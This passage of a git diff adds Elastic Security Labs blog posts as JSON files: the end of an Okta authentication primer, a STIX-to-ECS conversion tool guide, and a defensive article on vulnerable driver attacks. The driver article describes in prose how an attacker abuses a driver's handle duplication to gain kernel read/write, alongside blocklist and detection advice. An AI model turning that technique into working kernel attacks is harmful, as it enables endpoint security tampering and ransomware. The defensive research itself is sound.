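    """Access tokens carry an 'exp' claim (seconds since the epoch)."""
    return time.time() >= claims["exp"]

# Hypothetical token built for illustration -- not an Okta-issued token
claims = {"sub": "user@example.com", "scp": ["openid", "email"], "exp": 0}
payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
token = f"eyJhbGciOiJSUzI1NiJ9.{payload}.fake-signature"

print(decode_jwt_payload(token)["sub"])   # user@example.com
print(is_expired(decode_jwt_payload(token)))  # True, since exp is in the past
```

Decoding without verification is only appropriate for inspection and debugging; the signature check is what makes the claims trustworthy.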
The storage and handling of these tokens in client applications also significantly impact their overall security. Secure storage methods, such as in-memory or encrypted cookies, alongside careful management of token renewal processes, are essential to prevent unauthorized access and maintain the robustness of user sessions and access controls.\n\n# Authentication workflow\n\n## Authentication vs authorization\nBefore we dive into authentication in Okta, we should take a moment to understand the difference between authentication and authorization. To put it simply, authentication is providing evidence to prove identity, whereas authorization is about permissions and privileges once access is granted. \n\nAs we discussed throughout this blog, the Identity Engine and UD are critical to identity management in Okta. As a recap, the Identity Engine is used for enrolling, authenticating, and authorizing users. The UD is used as the main directory service in Okta that contains users, groups, profiles, and policies, also serving as the source of truth for user data. The UD can be synchronized with other directory services such as AD or LDAP through the Okta endpoint agent.\n\nIdentity can be managed via Okta or through an external IdP, such as Google Workspace. Essentially, when access to an application is requested, redirections to the authorization server’s API endpoints are generated for authentication to provide proof of identity.\n\nBelow are the main authentication protocols between the end user, resource server, and authorization server:\n\n - OIDC: Authentication protocol that sits on top of the OAuth authorization framework. Its workflow requires an ID token (JWT) to be obtained during an access token request.\n - SAML: Open standard protocol formatted in XML that facilitates user identity data exchange between SPs and IdPs.\n\nWithin Okta, there is plenty of flexibility and customization regarding authentication. 
Basic authentication is supported where simple username and password schemes are used over HTTP with additional parameters and configurations.\n\n## SAML in authentication\n\nAs previously stated, [SAML](https://developer.okta.com/docs/concepts/saml/) is a login standard that helps facilitate user access to applications based on HTTP(s) requests and sessions asynchronously. Over time, the use of basic credentials for each application quickly became a challenge, and thus federated identity was introduced to allow identity authentication across different SPs, facilitated by identity providers. \n\nSAML is primarily a web-based authentication mechanism as it relies on a flow of traffic between the end user, IdP, and SP. The SAML authentication flow can either be IdP or SP initiated depending on where the end user visits first for application access.\n\nThe SAML request is typically generated by the SP whereas the SAML response is generated by the IdP. The response contains the SAML assertion, which holds information about the authenticated user’s identity and is signed by the IdP.\n\nIt is important to note that during the SAML workflow, the IdP and SP typically never communicate directly, but instead rely on the end user’s browser for redirections. Typically, the SP trusts the IdP, and thus the identity data forwarded through the user’s web browser to the SP is trusted and access is granted to the requested application.\n\n\n\nIn step 5 from the diagram above, the SAML assertion would be sent as part of this response after the user has authenticated with the IdP. Remember that the assertion is in XML format and can be quite extensive as it contains identity information for the SP to parse and rely on for the end user’s identity verification. Generic examples of SAML assertions are [provided](https://www.samltool.com/generic_sso_res.php) by OneLogin. 
Auth0 also [provides](https://samltool.io/) a decoder and parser for these examples, as shown in the image below.\n\n\n\n## IdP vs SP responsibilities\n\nWhen discussing the roles and responsibilities of the SP and IdP, keep in mind that the SP is meant to provide access to applications for the end user, whereas the IdP provides authentication and authorization. The SP and IdP are typically set up to trust each other with their designated responsibilities. Depending on the end user, workflows for authentication and authorization can be SP or IdP initiated, with each workflow typically relying on RESTful API endpoints. For authentication, requests and responses are sent between the IdP and SP but often proxied through the end user’s browser.\n\nAlthough Okta is mainly an IdP and provides authentication and authorization services, it can also be used as an SP. Previously we discussed how Okta’s integration network allows for various 3rd-party applications to be connected and accessible to users through their dashboard. We also explained how authentication workflows can be SP initiated, meaning users could visit their Okta dashboard to request access to an application. At the same time, a 3rd-party IdP such as Google Workspace or Azure AD could be established, which would handle the authentication and authorization of the user. If the user were to request access with this type of setup, Okta would then redirect the user to Azure AD for authentication.\n\n## Single-factor vs multi-factor authentication\n\nSingle-factor authentication (SFA) is the simplest form of authentication, requiring a user to supply one credential object for authentication. Commonly, users are familiar with password-based authentication methods where a username and password are supplied to validate themselves. 
This of course has security implications if the credentials used are stolen, as they can be used by an adversary to log in and access the same resources.\n\nMultifactor authentication (MFA) is similar to SFA, except it requires two or more types of credentials or evidence to be supplied for authentication, typically in sequence. For example, a password-based credential may be supplied and, once verified by the IdP, an OTP may then be requested, supplied via a mobile device authenticator application, SMS message, email, or another method. The common types of authentication factors are something the user knows, something the user possesses, and something the user is (inherence). This also increases complexity for adversaries, thanks to randomized OTP generation and MFA token expiration.\n\nOkta enables other types of authentication methods such as passwordless, risk-based, biometric, transaction, and others. A full list of authentication methods and descriptions can be found [here](https://developer.okta.com/docs/concepts/iam-overview-authentication-factors/#authentication-methods).\n\nEvery application or integration added to the Okta organization has an [authentication policy](https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/about-app-sign-on-policies.htm), which verifies conditions for users who attempt to access each application. Authentication policies can also help enforce factor requirements based on these conditions where the UD and user profile are used to analyze information about the user. Authentication policies can be set globally for applications and users or can be more granular if set at the application level where specific user conditions are met. Authentication policies can be updated, cloned, preset, and merged if duplicate policies exist. Rules that define these granular conditions can be applied to these authentication policies with the Okta Expression Language ([EL](https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/el-about.htm)). 
\n\n## Client-side and server-side communications\n\nUnderstanding the distinction between front-end (user-browser interactions) and back-end (server-to-server communications) is crucial in web-based authentication systems. Front-end interactions typically involve user interfaces and actions, while back-end channels handle critical exchanges like SAML assertions or OAuth tokens, crucial for secure authentication.\n\nIn Okta's framework, the interplay between browser and server is key for security and user experience. When a user logs in via Okta, the browser first authenticates with Okta, which then sends back the necessary tokens. These are forwarded to the application server which validates them with Okta, ensuring a secure, behind-the-scenes token exchange.\n\nOkta’s token management is marked by stringent security. Issued tokens like ID and access tokens are securely exchanged among the user’s browser, Okta, and application servers. Protocols like HTTPS and OAuth 2.0 safeguard these transmissions. Features like token rotation and automatic revocation further bolster security, preventing unauthorized access.\n\nIntegrating Okta into an application reshapes its design and security. This offloads significant security responsibilities, allowing developers to focus on core functions. Such integration leads to a modular architecture, where authentication services are separate from application logic. \n\n# Conclusion\n\nWe’ve unraveled the complexities of Okta’s architecture and services, providing insights into its role as a leader in modern authentication and authorization. With the platform’s utilization of protocols like OAuth, OIDC, and SAML, Okta stands at the forefront of scalable, integrated solutions, seamlessly working with platforms such as Azure AD and Google Workspace.\n\nOkta's SaaS design, featuring a RESTful API, makes it a versatile Identity Provider (IdP) and Service Provider (SP). Yet, its popularity also brings potential security vulnerabilities. 
For cybersecurity professionals, it’s crucial to grasp Okta’s complexities to stay ahead of evolving threats. This introduction sets the stage for upcoming deeper analyses of Okta's attack surface, the setup of a threat detection lab, and the exploration of common attacks.\n\nArmed with this knowledge, you’re now better equipped to analyze, understand, and mitigate the evolving cybersecurity challenges associated with Okta’s ecosystem.\n"
+ },
+ "title": "Starter guide to understanding Okta",
+ "slug": "starter-guide-to-understanding-okta",
+ "subtitle": "An introduction for security analysts",
+ "date": "2024-01-23",
+ "description": "This article delves into Okta's architecture and services, laying a solid foundation for threat research and detection engineering. Essential reading for those aiming to master threat hunting and detection in Okta environments.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ }
+ ],
+ "image": "photo-edited-09.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-starter_guide_to_understanding_okta-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stixy_situations_ecsaping_your_threat_data-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stixy_situations_ecsaping_your_threat_data-md.json
new file mode 100644
index 00000000000..43302c755db
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stixy_situations_ecsaping_your_threat_data-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"STIXy Situations: ECSaping your threat data\"\nsubtitle: \"Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack.\"\nslug: \"stixy-situations-ecsaping-your-threat-data\"\ndate: \"2024-02-09\"\ndescription: \"Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack.\"\nauthor:\n - slug: cyril-francois\n - slug: andrew-pease\nimage: \"photo-edited-07@2x.jpg\"\ncategory:\n - slug: tools\n---\n\n## Preamble\nOrganizations that use threat indicators or observables consume, create, and/or (ideally) publish threat data. This data can be used internally or externally as information or intelligence to inform decision-making and event prioritization.\n\nWhile there are several formats for this information to be structured into, the de facto industry standard is [Structured Threat Information Expression (STIX)](https://oasis-open.github.io/cti-documentation/stix/intro). STIX is managed by the [OASIS Cyber Threat Intelligence Technical Committee](https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti) and enables organizations to share threat data in a standard and machine-readable format.\n\nAt Elastic, we developed the [Elastic Common Schema (ECS)](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) as a data normalization capability. “[ECS] is an open source specification, developed with support from the Elastic user community. 
ECS defines a common set of fields for storing event data in Elasticsearch, such as logs and metrics.” In April of 2023, [Elastic contributed ECS](https://www.elastic.co/blog/ecs-elastic-common-schema-otel-opentelemetry-announcement) to the [OpenTelemetry Semantic Conventions (OTel)](https://opentelemetry.io/docs/concepts/semantic-conventions/) as a commitment to the joint development of an open schema. \n\nThe security community shares threat data in the STIX format, so to store that data in Elasticsearch for analysis and threat detection [[1](https://www.elastic.co/guide/en/security/current/threat-intel-hash-indicator-match.html)] [[2](https://www.elastic.co/guide/en/security/current/threat-intel-ip-address-indicator-match.html)] [[3](https://www.elastic.co/guide/en/security/current/threat-intel-url-indicator-match.html)] [[4](https://www.elastic.co/guide/en/security/current/threat-intel-windows-registry-indicator-match.html)], we created a tool that converts STIX documents into ECS and outputs the threat data either as a file or directly into Elasticsearch indices. If this was a challenge for us, it was a challenge for others - therefore, we decided to release a version of the tool.\n\nThis tool uses the [Elastic License 2.0](https://www.elastic.co/licensing/elastic-license) and is available for download [here](https://github.com/elastic/labs-releases/tree/main/tools/stix-to-ecs).\n\n## Getting started\nThis project will take a STIX 2.x formatted JSON document and create an ECS version. There are three output options: STDOUT as JSON, an NDJSON file, and/or directly to an Elasticsearch cluster.\n\n### Prerequisites\nThe STIX 2 ECS project requires Python 3.10+ and the [stix2](https://pypi.org/project/stix2/), [Elasticsearch](https://pypi.org/project/elasticsearch/), and [getpass](https://pypi.org/project/getpass4/) modules.\n\nIf exporting to Elasticsearch, you will need the host information and authentication credentials. 
API authentication is not yet implemented.\n\n### Setup\nCreate a virtual environment and install the required prerequisites.\n\n```\ngit clone https://github.com/elastic/labs-releases.git\ncd tools/stix2ecs\npython -m venv /path/to/virtual/environments/stix2ecs\nsource /path/to/virtual/environments/stix2ecs/bin/activate\npython -m pip install -r requirements.txt\n```\n\n## Operation\nThe input is a STIX 2.x JSON document (or a folder of JSON documents); the output defaults to STDOUT, with an option to create an NDJSON file and/or send to an Elasticsearch cluster.\n\n```\nstix_to_ecs.py [-h] -i INPUT [-o OUTPUT] [-e] [--index INDEX] [--url URL] \\\n[--user USER] [-p PROVIDER] [-r]\n```\n\nBy default, the ECS file is named the same as the STIX file input but with `.ecs.ndjson` appended.\n\n### Arguments\nThe script has several arguments, the only mandatory field is `-i` for the input. By default, the script will output the NDJSON document to STDOUT.\n\n| Option | Description |\n| - | - |\n| -h | displays the help menu |\n| -i | specifies the input STIX document (mandatory) |\n| -o | specifies the output ECS document (optional) |\n| -p | defines the ECS provider field (optional) |\n| -r | recursive mode to convert multiple STIX documents (optional) |\n| -e | specifies the Elasticsearch output mode (optional) |\n| --index | defines the Elasticsearch Index, requires `-e` (optional) |\n| --url | defines the Elasticsearch URL, requires `-e` (optional) |\n| --user | defines the Elasticsearch username, requires `-e` (optional) |\n\n## Examples\nThere are two sample files located in the `test-inputs/` directory. 
One is from [CISA](https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/automated-indicator-sharing-ais) (Cybersecurity & Infrastructure Security Agency), and one is from [OpenCTI](https://github.com/OpenCTI-Platform/opencti) (an open source threat intelligence platform).\n\n### STIX file input to STDOUT\nThis will output the STIX document to STDOUT in ECS format.\n\n```\npython stix_to_ecs.py -i test-inputs/cisa_sample_stix.json | jq\n\n[\n {\n \"threat\": {\n \"indicator\": {\n \"file\": {\n \"name\": \"123.ps1\",\n \"hash\": {\n \"sha256\": \"ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44\"\n }\n },\n \"type\": \"file\",\n \"description\": \"Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}\",\n \"first_seen\": \"2023-11-21T18:57:25.000Z\",\n \"provider\": \"identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01\",\n \"modified_at\": \"2023-11-21T18:57:25.000Z\",\n \"marking\": {\n \"tlp\": \"clear\"\n }\n }\n }\n },\n...\n```\n\n### STIX file input to ECS file output\nThis will create a folder called `ecs` in the present directory and write the ECS file there.\n\n```\npython stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -o ecs\n\ncat ecs/cisa_sample_stix.ecs.ndjson | jq\n{\n \"threat\": {\n \"indicator\": {\n \"file\": {\n \"name\": \"123.ps1\",\n \"hash\": {\n \"sha256\": \"ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44\"\n }\n },\n \"type\": \"file\",\n \"description\": \"Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}\",\n \"first_seen\": \"2023-11-21T18:57:25.000Z\",\n \"provider\": \"identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01\",\n \"modified_at\": \"2023-11-21T18:57:25.000Z\",\n \"marking\": {\n \"tlp\": \"clear\"\n }\n }\n }\n}\n...\n```\n\n### STIX file input to ECS file output, defining the Provider field\nThe provider field is commonly a GUID in the STIX document. 
To make it more user-friendly, you can use the `-p` argument to define the `threat.indicator.provider` field.\n\n```\npython stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -o ecs -p \"Elastic Security Labs\"\n\ncat ecs/cisa_sample_stix.ecs.ndjson | jq\n{\n \"threat\": {\n \"indicator\": {\n \"file\": {\n \"name\": \"123.ps1\",\n \"hash\": {\n \"sha256\": \"ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44\"\n }\n },\n \"type\": \"file\",\n \"description\": \"Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}\",\n \"first_seen\": \"2023-11-21T18:57:25.000Z\",\n \"provider\": \"Elastic Security Labs\",\n \"modified_at\": \"2023-11-21T18:57:25.000Z\",\n \"marking\": {\n \"tlp\": \"clear\"\n }\n }\n }\n}\n...\n```\n\n### STIX directory input to ECS file outputs\nIf you have a directory of STIX documents, you can use the `-r` argument to recursively search through the directory and write the ECS documents to the output directory.\n\n```\npython stix_to_ecs.py -ri test-inputs -o ecs\n```\n\n### STIX file input to Elasticsearch output\nTo output to Elasticsearch, you can use either Elastic Cloud or a local instance. Local Elasticsearch will use port `9200` and Elastic Cloud will use port `443`. By default, a valid TLS session to Elasticsearch is required.\n\nFirst, create an index if you don't already have one. 
In this example, we’re creating an index called `stix2ecs`, but the index name isn’t relevant.\n\n```\ncurl -u {username} -X PUT \"https://elasticsearch:port/stix2ecs?pretty\"\n\n{\n \"acknowledged\" : true,\n \"shards_acknowledged\" : true,\n \"index\" : \"stix2ecs\"\n}\n```\n\nNext, define the Elasticsearch output options.\n\n```\npython stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -e --url https://elasticsearch:port --user username --index stix2ecs\n```\n\nIf you’re storing the data in Elasticsearch for use in another platform, you can view the indicators using cURL.\n\n```\ncurl -u {username} https://elasticsearch:port/stix2ecs/_search?pretty\n\n{\n \"took\" : 2,\n \"timed_out\" : false,\n \"_shards\" : {\n \"total\" : 1,\n \"successful\" : 1,\n \"skipped\" : 0,\n \"failed\" : 0\n },\n \"hits\" : {\n \"total\" : {\n \"value\" : 3,\n \"relation\" : \"eq\"\n },\n \"max_score\" : 1.0,\n \"hits\" : [\n {\n \"_index\" : \"stix2ecs\",\n \"_id\" : \"n2lt8IwBahlUtp0hzm9i\",\n \"_score\" : 1.0,\n \"_source\" : {\n \"threat\" : {\n \"indicator\" : {\n \"file\" : {\n \"name\" : \"123.ps1\",\n \"hash\" : {\n \"sha256\" : \"ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44\"\n }\n },\n \"type\" : \"file\",\n \"description\" : \"Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}\",\n \"first_seen\" : \"2023-11-21T18:57:25.000Z\",\n \"provider\" : \"identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01\",\n \"modified_at\" : \"2023-11-21T18:57:25.000Z\",\n \"marking\" : {\n \"tlp\" : \"clear\"\n }\n }\n }\n }\n }\n...\n```\n\nIf you’re using Kibana, you can [create a Data View](https://www.elastic.co/guide/en/kibana/current/data-views.html) for your `stix2ecs` index to view the ingested indicators. 
\n\n\n\n\nFinally, you can use this as an indicator source for [Indicator Match rules](https://www.elastic.co/guide/en/security/current/prebuilt-rule-1-0-2-threat-intel-indicator-match.html).\n\n\n\n\n## Summary\nWe hope this project helps your organization analyze and operationalize your threat data. If you’re new to the Elastic Common Schema, you can learn more about that [here](https://www.elastic.co/guide/en/ecs/current/index.html). \n\nAs always, please feel free to open an [issue](https://github.com/elastic/labs-releases/issues) with any questions, comments, concerns, or complaints. \n\n## About Elastic Security Labs\nElastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.\n\nFollow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). \n"
+ },
+ "title": "STIXy Situations: ECSaping your threat data",
+ "slug": "stixy-situations-ecsaping-your-threat-data",
+ "subtitle": "Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack.",
+ "date": "2024-02-09",
+ "description": "Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack.",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "photo-edited-07@2x.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ]
+ },
+ "id": "security_labs_content-stixy_situations_ecsaping_your_threat_data-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stopping_vulnerable_driver_attacks-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stopping_vulnerable_driver_attacks-md.json
new file mode 100644
index 00000000000..049b5f859a2
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stopping_vulnerable_driver_attacks-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Stopping Vulnerable Driver Attacks\"\nslug: \"stopping-vulnerable-driver-attacks\"\ndate: \"2023-03-01\"\nsubtitle: \"Using vulnerable drivers to gain kernel mode execution.\"\ndescription: \"This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.\"\nauthor:\n - slug: joe-desimone\nimage: \"blog-thumb-clock-gears.jpg\"\ncategory:\n - slug: security-operations\n - slug: detection-science\n---\n\n## Key takeaways\n\n- Ransomware actors are leveraging vulnerable drivers to tamper with endpoint security products.\n- Elastic Security [released](https://github.com/elastic/protections-artifacts/search?q=VulnDriver) 65 YARA rules to detect vulnerable driver abuse.\n- Elastic Endpoint (8.3+) protects users from this threat.\n\n## Background\n\nIn 2018, [Gabriel Landau](https://twitter.com/GabrielLandau) and [Joe Desimone](https://twitter.com/dez_) presented a [talk](https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf) at Black Hat covering the evolution of kernel mode threats on Windows. The most concerning trend was towards leveraging known good but vulnerable drivers to gain kernel mode execution. We showed this was practical, even with hypervisor mode integrity protection ([HVCI](https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-hvci-enablement)) and Windows Hardware Quality Labs ([WHQL](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature)) signing requirement enabled. 
At the time, the risk to everyday users was relatively low, as these techniques were mostly leveraged by advanced state actors and top red teams.\n\nFast forward to 2022, and attacks leveraging vulnerable drivers are a growing concern due to a [proliferation](https://github.com/hfiref0x/KDU) of open source [tools](https://github.com/br-sn/CheekyBlinder) to perform these [attacks](https://github.com/Cr4sh/KernelForge). Vulnerable drivers have now been [used by ransomware](https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/) to terminate security software before encrypting the system. Organizations can reduce their risk by limiting administrative user permissions. However, it is also imperative for security vendors to protect the user-to-kernel boundary because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. Kernel access gives attackers free rein to tamper or terminate endpoint security products or inject code into protected processes.\n\nThis post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.\n\n## Attack flow\n\nThere are a number of flaws in drivers that can allow attackers to gain kernel mode access to fully compromise the system and remain undetected. Some of the [most common](https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/) flaws include granting user mode processes write access to virtual memory, physical memory, or [model-specific registers](https://en.wikipedia.org/wiki/Model-specific_register) (MSR). Classic buffer overflows and missing bounds checks are also common.\n\nA less common driver flaw is unrestricted [handle duplication](https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458). 
While this may seem like innocuous functionality at first glance, handle duplication can be leveraged to gain full kernel code execution by user mode processes. For example, the latest [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer) driver by Microsoft exposes [such a function](https://github.com/Yaxser/Backstab).\n\nAn attacker can leverage this vulnerability to duplicate a [sensitive handle](https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458) to raw physical memory present in the System (PID 4) process.\n\n\n\nAfter obtaining [the cr3 value](http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf), the attacker can walk the page tables to convert virtual kernel addresses to their associated physical addresses. This grants an arbitrary virtual read/write primitive, which attackers can leverage to easily tamper with kernel data structures or execute arbitrary kernel code. On HVCI-enabled systems, thread control flow can be hijacked to execute arbitrary kernel functions as shown below.\n\n\n\nWe reported this issue to Microsoft in the vulnerable driver [submission portal](https://www.microsoft.com/en-us/wdsi/driversubmission) on July 26, but as of this writing have not received a response. We hope Microsoft will consider this a serious security issue worth addressing. Ideally, they will release a fixed version without the vulnerable [IOCTLs](https://docs.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-) and include it in the default HVCI blocklist. 
This would be consistent with the [blocking](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/ce56a2f15015e07bf35cd05ce3299340d16e759a/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md?plain=1#L391) of the ProcessHacker (now known as [System Informer](https://github.com/winsiderss/systeminformer)) driver for the [same flaw.](https://www.unknowncheats.me/forum/downloads.php?do=file&id=25441)\n\n## Blocklisting\n\nBlocklisting prevents known vulnerable drivers from loading on a system, and is a great first step to the vulnerable driver problem. Blocklisting can raise the cost of kernel attacks to levels out of reach for some criminal groups, while maintaining low false positive rates. The downside is it does not stop more [advanced groups](https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/), which can identify new, previously-unknown, vulnerable drivers.\n\nMicrosoft maintains a [catalog](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md) of known exploited or malicious drivers, which should be a minimum baseline. This catalog consists of rules using various combinations of [Authenticode](https://reversea.me/index.php/authenticode-i-understanding-windows-authenticode/) hash, certificate hash (also known as [TBS](https://www.rfc-editor.org/rfc/rfc5280#section-4.1)), internal file name, and version. The catalog is intended to be used by Windows Defender Application Control ([WDAC](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview)). 
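Conceptually, blocklist matching reduces to checking a driver's hash and metadata against known-bad entries. A simplified sketch of the idea (the entries below are hypothetical, and a plain SHA-256 file hash stands in for the Authenticode and certificate TBS hashes real rules combine):

```python
import hashlib

# Hypothetical blocklist entries; any single matching condition blocks the load.
BLOCKED_SHA256 = {
    "0000000000000000000000000000000000000000000000000000000000000000",  # placeholder hash
}
BLOCKED_NAME_VERSION = {
    ("vulnerable_example.sys", "1.2.3"),  # example internal file name + version pair
}

def should_block(driver_bytes: bytes, internal_name: str, version: str) -> bool:
    """Return True if the driver matches a blocklist entry by hash or by name+version."""
    digest = hashlib.sha256(driver_bytes).hexdigest()
    return digest in BLOCKED_SHA256 or (internal_name.lower(), version) in BLOCKED_NAME_VERSION

print(should_block(b"MZ...fake driver bytes", "Vulnerable_Example.sys", "1.2.3"))  # True
```

Matching on metadata pairs as well as hashes is what lets a single rule cover every signed copy of a known-vulnerable driver version, not just one specific binary.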
We used this catalog as a starting point for a more comprehensive list using the [YARA](https://virustotal.github.io/yara/) community standard.\n\nTo expand on the existing list of known vulnerable drivers, we pivoted through VirusTotal data with known vulnerable import hashes and other metadata. We also combed through public attack tooling to identify additional vulnerable drivers. As is common practice for Elastic Security, we made our [blocklist](https://github.com/elastic/protections-artifacts/search?q=VulnDriver) available to the community. In Elastic [Endpoint Security](https://www.elastic.co/security/endpoint-security) version 8.3 and newer, all drivers are validated against the blocklist in-line before they are allowed to load onto the system (shown below).\n\n\n\n## Allowlisting\n\nOne of the most robust defenses against this driver threat is to only allow combinations of driver signer, internal file name, version, and/or hashes that are known to be in use. We recommend organizations be as strict as feasible. For example, do not blanket trust all [WHQL](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-test-signature-program)-signed drivers. This is the classic application control method, albeit focused on drivers. An organization’s diversity of drivers should be more manageable than the entirety of user mode applications. Windows Defender Application Control ([WDAC](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview)) is a powerful built-in feature that can be configured this way. However, the learning curve and maintenance costs may still be too high for organizations without well-staffed security teams. 
To reap most of the benefits of the allowlisting approach, but reduce the cost of implementation to the users (ideally to blocklisting levels), we recommend two approaches in tandem: behavior control and alert on first seen.\n\n## Behavior control\n\nThe concept behind behavior control is to produce a more manageable set of allowlistable behavior choke points that can be tuned for high confidence. For example, we can create a behavior control around which applications are allowed to write drivers to disk. This may start with a relatively loose and simple rule:\n\n\n\nFrom there, we can allowlist the benign applications that are known to exhibit this behavior. Then we receive and triage hits, tune the rule until it becomes high confidence, and ship it as part of our [malicious behavior protection](https://www.elastic.co/blog/whats-new-elastic-security-7-15-0). Elastic SIEM users can use the same technique to [create custom](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) Detection Engine [rules](https://github.com/elastic/detection-rules) tuned specifically for their environment.\n\n## First seen\n\nElastic Security 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the [“New Terms” rule type](https://www.elastic.co/guide/en/security/8.4/rules-ui-create.html#create-new-terms-rule), which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc.) is observed for the first time.\n\n\n\nThis empowers security teams to quickly surface unusual drivers the first time they’re seen in their environment, creating a detection opportunity even for previously unknown vulnerable drivers or other driver-based adversary tradecraft.\n\n\n\n## Conclusion\n\nVulnerable driver exploitation, once relegated to advanced adversaries, has now proliferated to the point of being used in ransomware attacks. 
The time for the security community to come together and act on this problem is now. We can start raising the cost by collaborating on blocklists as a community. We should also investigate additional detection strategies, such as behavior control and anomaly detection, to raise the cost further without requiring significant security expertise or resources.\n"
+ },
+ "title": "Stopping Vulnerable Driver Attacks",
+ "slug": "stopping-vulnerable-driver-attacks",
+ "subtitle": "Using vulnerable drivers to gain kernel mode execution.",
+ "date": "2023-03-01",
+ "description": "This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.",
+ "author": [
+ {
+ "slug": "joe-desimone"
+ }
+ ],
+ "image": "blog-thumb-clock-gears.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-stopping_vulnerable_driver_attacks-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-storm_on_the_horizon-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-storm_on_the_horizon-md.json
new file mode 100644
index 00000000000..c3c218e0df1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-storm_on_the_horizon-md.json
@@ -0,0 +1,34 @@
+{
+ "attributes": {
+ "raw": {
